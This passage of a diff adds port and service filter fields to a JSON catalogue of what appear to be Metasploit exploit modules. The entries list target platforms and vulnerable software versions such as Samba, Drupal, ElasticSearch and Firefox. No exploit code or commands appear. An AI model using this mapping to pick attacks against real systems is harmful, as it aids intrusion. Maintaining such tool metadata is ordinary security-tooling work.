"autofilter_services": [ + + ], "targets": [ "Gentoo 2006.0 Linux 2.6" ], @@ -41568,6 +55129,12 @@ "platform": "Linux", "arch": "", "rport": 5432, + "autofilter_ports": [ + 5432 + ], + "autofilter_services": [ + "postgres" + ], "targets": [ "Linux x86", "Linux x86_64" @@ -41603,6 +55170,12 @@ "platform": "Linux", "arch": "x86", "rport": 1723, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux Bruteforce" ], @@ -41637,6 +55210,12 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux Bruteforce" ], @@ -41671,6 +55250,14 @@ "platform": "Linux", "arch": "", "rport": 139, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Linux (Debian5 3.2.5-4lenny6)", "Debugging Target" @@ -41706,6 +55293,14 @@ "platform": "Linux", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic (Interact)", "Automatic (Command)", @@ -41755,6 +55350,14 @@ "platform": "Linux", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Linux vsyscall", "Linux Heap Brute Force (Debian/Ubuntu)", @@ -41801,6 +55404,14 @@ "platform": "Linux,Unix", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10", "2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.10", @@ -41841,6 +55452,14 @@ "platform": "Linux", "arch": "", "rport": 139, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Samba 2.2.x - Bruteforce" ], @@ -41876,6 +55495,18 @@ "platform": "Linux", "arch": "x86", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": [ "Linux x86" ], @@ -41913,6 +55544,12 @@ "platform": "Unix", "arch": "cmd", "rport": 25, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -41948,6 +55585,12 @@ "platform": "Linux", "arch": "x64, x86", "rport": 25, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "linux x64", "linux x86" @@ -41985,6 +55628,12 @@ "platform": "Unix", "arch": "cmd", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -42018,6 +55667,12 @@ "platform": "Unix", "arch": "cmd", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -42052,6 +55707,12 @@ "platform": "Unix", "arch": "cmd", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -42083,6 +55744,12 @@ "platform": "Unix", "arch": "cmd", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -42115,6 +55782,12 @@ "platform": "Python", "arch": "python", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -42146,6 +55819,12 @@ "platform": "Unix", "arch": "cmd", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -42177,6 +55856,12 @@ "platform": "Unix", "arch": "cmd", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Quantum vmPRO 3.1.2" ], @@ -42209,6 +55894,12 @@ "platform": "Python", "arch": "python", "rport": 32022, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -42245,6 +55936,12 @@ "platform": "Unix", "arch": "cmd", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Symantec Messaging Gateway 9.5" ], @@ -42278,6 +55975,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Ubiquiti airOS < 5.6.2" ], @@ -42310,6 +56022,12 @@ "platform": "Unix", "arch": "cmd", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -42345,6 +56063,12 @@ "platform": "Unix", "arch": "cmd", "rport": 23, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic (detect TCP or UDP)", "TCP (typically older devices)", @@ -42384,6 +56108,12 @@ "platform": "Linux", "arch": "", "rport": 23, + "autofilter_ports": [ + 23 + ], + "autofilter_services": [ + "telnet" + ], "targets": [ "Automatic", "Red Hat Enterprise Linux 3 (krb5-telnet)" @@ -42418,6 +56148,12 @@ "platform": "", "arch": "", "rport": 1900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MIPS Little Endian", "MIPS Big Endian" @@ -42456,6 +56192,21 @@ "platform": "Linux", "arch": "x86, mipsbe", "rport": 5555, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Debian GNU/Linux 6.0 / MiniUPnPd 1.0", "Airties RT-212 v1.2.0.23 / MiniUPnPd 1.0" @@ -42490,6 +56241,13 @@ "platform": "Mainframe", "arch": "cmd", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic" ], @@ -42526,6 +56284,12 @@ "platform": "Linux,Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows", "Linux" @@ -42568,6 +56332,12 @@ "platform": "Linux,Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows", "Linux" @@ -42607,6 +56377,12 @@ "platform": "Linux,Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows", "Linux" @@ -42644,6 +56420,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -42680,6 +56462,12 @@ "platform": "Linux,Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows", "Linux" @@ -42718,6 +56506,12 @@ "platform": "Linux,Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows", "Linux" @@ -42756,6 +56550,12 @@ "platform": "Linux,Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows", "Linux" @@ -42793,6 +56593,12 @@ "platform": "Linux,Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows", "Linux" @@ -42829,6 +56635,12 @@ "platform": "OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Firefox 3.5.0 on Windows XP SP0-SP3", "Firefox 3.5.0 on Mac OS X 10.5.7 (Intel)" @@ -42864,6 +56676,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal (Javascript XPCOM Shell)", "Native Payload" @@ -42900,6 +56718,12 @@ "platform": "Java,Linux,OSX,Solaris,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal (Javascript XPCOM Shell)", "Native Payload" @@ -42935,6 +56759,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal (Javascript XPCOM Shell)", "Native Payload" @@ -42970,6 +56800,12 @@ "platform": "Linux,OSX", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Firefox 1.5.0.0 Mac OS X", "Firefox 1.5.0.0 Linux" @@ -43009,6 +56845,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal (Javascript XPCOM Shell)", "Native Payload" @@ -43043,6 +56885,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal (Javascript XPCOM Shell)", "Native Payload" @@ -43077,6 +56925,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal (Javascript XPCOM Shell)", "Native Payload" @@ -43111,6 +56965,12 @@ "platform": "Java,Linux,OSX,Solaris,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal (Javascript XPCOM Shell)", "Native Payload" @@ -43146,6 +57006,12 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "OS X" ], @@ -43187,6 +57053,12 @@ "platform": "Java,Linux,OSX,Solaris,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)", @@ -43227,6 +57099,12 @@ "platform": "Linux,OSX,Solaris,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)", @@ -43266,6 +57144,12 @@ "platform": "OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "J2SE 1.6_16 on Windows x86", "J2SE 1.6_16 on Mac OS X PPC", @@ -43305,6 +57189,12 @@ "platform": "Java,Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)", @@ -43351,6 +57241,12 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows Universal", @@ -43390,6 +57286,12 @@ "platform": "Java,Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)", @@ -43430,6 +57332,12 @@ "platform": "Java,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows Universal", @@ -43471,6 +57379,12 @@ "platform": "Java,Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)", @@ -43515,6 +57429,12 @@ "platform": "Java,Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)", @@ -43554,6 +57474,12 @@ "platform": "Java,Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)", @@ -43594,6 +57520,12 @@ "platform": "Java,Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)", @@ -43635,6 +57567,12 @@ "platform": "Java,Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)", @@ -43675,6 +57613,12 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows Universal", @@ -43713,6 +57657,12 @@ "platform": "Java", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)" ], @@ -43747,6 +57697,12 @@ "platform": "OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "J2SE 1.6_16 on Windows x86", "J2SE 1.6_16 on Mac OS X PPC", @@ -43780,6 +57736,12 @@ "platform": "Java,Linux,OSX,Solaris,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)", @@ -43821,6 +57783,12 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows Universal", @@ -43858,6 +57826,12 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows Universal", @@ -43902,6 +57876,12 @@ "platform": "Java,Linux,OSX,Solaris,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)", @@ -43941,6 +57921,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Firefox < 1.0.5, Mozilla < 1.7.10, Windows" ], @@ -43975,6 +57961,12 @@ "platform": "Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Firefox 1.5.0.4 Windows x86", "Firefox 1.5.0.4 Linux x86", @@ -44009,6 +58001,12 @@ "platform": "Ruby", "arch": "ruby", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -44040,6 +58038,12 @@ "platform": "Unix", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Opera < 9.10 Unix Cmd" ], @@ -44076,6 +58080,12 @@ "platform": "Unix", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Opera < 9.61 Unix Cmd" ], @@ -44112,6 +58122,12 @@ "platform": "OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Quicktime 7 on Windows x86", "Quicktime 7 on Mac OS X PPC", @@ -44151,6 +58167,21 @@ "platform": "Java", "arch": "java", "rport": 9200, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ElasticSearch 1.1.1 / Automatic" ], @@ -44187,6 +58218,21 @@ "platform": "Java", "arch": "java", "rport": 9200, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ElasticSearch 1.4.2" ], @@ -44223,6 +58269,12 @@ "platform": "Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader Windows Universal (JS Heap Spray)", "Adobe Reader Linux Universal (JS Heap Spray)" @@ -44258,6 +58310,12 @@ "platform": "Linux,Unix,Windows", "arch": "cmd, x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Unix (In-Memory)", "PowerShell (In-Memory)", @@ -44291,6 +58349,12 @@ "platform": "NodeJS", "arch": "nodejs", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -44323,6 +58387,12 @@ "platform": "Linux,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows", "Windows X64", @@ -44362,6 +58432,12 @@ "platform": "NodeJS", "arch": "nodejs", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -44393,6 +58469,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Microsoft Office Word on Windows", "Microsoft Office Word on Mac OS X (Python)" @@ -44429,6 +58511,12 @@ "platform": "Linux,Unix,Windows", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -44462,6 +58550,12 @@ "platform": "Java,NodeJS,PHP,Ruby", "arch": "nodejs, php, java, ruby", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "NodeJS", "PHP", @@ -44503,6 +58597,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Linux x86", "Linux x86_64" @@ -44540,6 +58641,13 @@ "platform": "Linux", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic Targeting", "Slackware 2.1 (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994)", @@ -44574,6 +58682,12 @@ "platform": "Linux,OSX,Unix", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "x86 (32-bit)", "x86_64 (64-bit)" @@ -44606,6 +58720,12 @@ "platform": "Android,Apple_iOS,BSD,Java,JavaScript,Linux,Mainframe,Multi,NodeJS,OSX,PHP,Python,Ruby,Solaris,Unix,Windows", "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "An Unforgettable Luncheon", "Legitimate Theater" @@ -44639,6 +58759,12 @@ "platform": "Android,Apple_iOS,BSD,Java,JavaScript,Linux,Mainframe,Multi,NodeJS,OSX,PHP,Python,Ruby,Solaris,Unix,Windows", "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Wildcard Target" ], @@ -44672,6 +58798,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -44706,6 +58847,21 @@ "platform": "BSD,Linux,OSX,Unix,Windows", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "AjaXplorer 2.5.5 or older" ], @@ -44739,6 +58895,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 8161, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Java Universal", "Linux", @@ -44777,6 +58948,21 @@ "platform": "Linux,Windows", "arch": "java", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Apache Jetspeed <= 2.3.0 (Linux)", "Apache Jetspeed <= 2.3.0 (Windows)" @@ -44818,6 +59004,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux x86", "Linux x86_64" @@ -44855,6 +59056,21 @@ "platform": "Java", "arch": "java", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Apache Roller 5.0.1" ], @@ -44890,6 +59106,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "appRain 0.1.5 or less" ], @@ -44923,6 +59154,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -44956,6 +59202,21 @@ "platform": "Linux,PHP", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)", "Linux x86" @@ -44992,6 +59253,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Java", "Windows Universal", @@ -45027,6 +59303,21 @@ "platform": "BSD,Linux", "arch": "x86, x64", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Bassmaster <= 1.5.1" ], @@ -45060,6 +59351,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Bolt 2.2.4" ], @@ -45092,6 +59398,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "BuilderEngine 3.5.0" ], @@ -45126,6 +59447,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -45161,6 +59497,21 @@ "platform": "Java", "arch": "java", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Cisco DCNM 6.1(2) / Java Universal" ], @@ -45194,6 +59545,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Clipbucket < 4.0.0 - Release 4902" ], @@ -45229,6 +59595,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Universal" ], @@ -45263,6 +59644,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows", "Linux" @@ -45303,6 +59699,21 @@ "platform": "Unix", "arch": "cmd", "rport": 631, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -45338,6 +59749,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -45369,6 +59795,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "CasinoLoader gateway.php" ], @@ -45406,6 +59847,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Drupal 7.0 - 7.31 (form-cache PHP injection method)", "Drupal 7.0 - 7.31 (user-post PHP injection method)" @@ -45440,6 +59896,21 @@ "platform": "Linux,PHP", "arch": "php", "rport": 4679, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)", "Linux x86" @@ -45476,6 +59947,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 8400, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Eventlog Analyzer v7.0 - v8.0 / Java universal", @@ -45513,6 +59999,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -45550,6 +60051,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -45582,6 +60098,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -45615,6 +60146,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic GestioIP 3.0" ], @@ -45654,6 +60200,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows Powershell" @@ -45687,6 +60239,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -45719,6 +60277,21 @@ "platform": "Linux", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux", "Linux (x64)", @@ -45756,6 +60329,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "GitList v0.6.0" ], @@ -45788,6 +60376,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -45822,6 +60425,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 4848, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Java Universal", @@ -45858,6 +60476,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -45891,6 +60524,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "GLPI 0.84 or older" ], @@ -45927,6 +60575,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -45962,6 +60625,21 @@ "platform": "Unix,Windows", "arch": "x86, cmd", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + 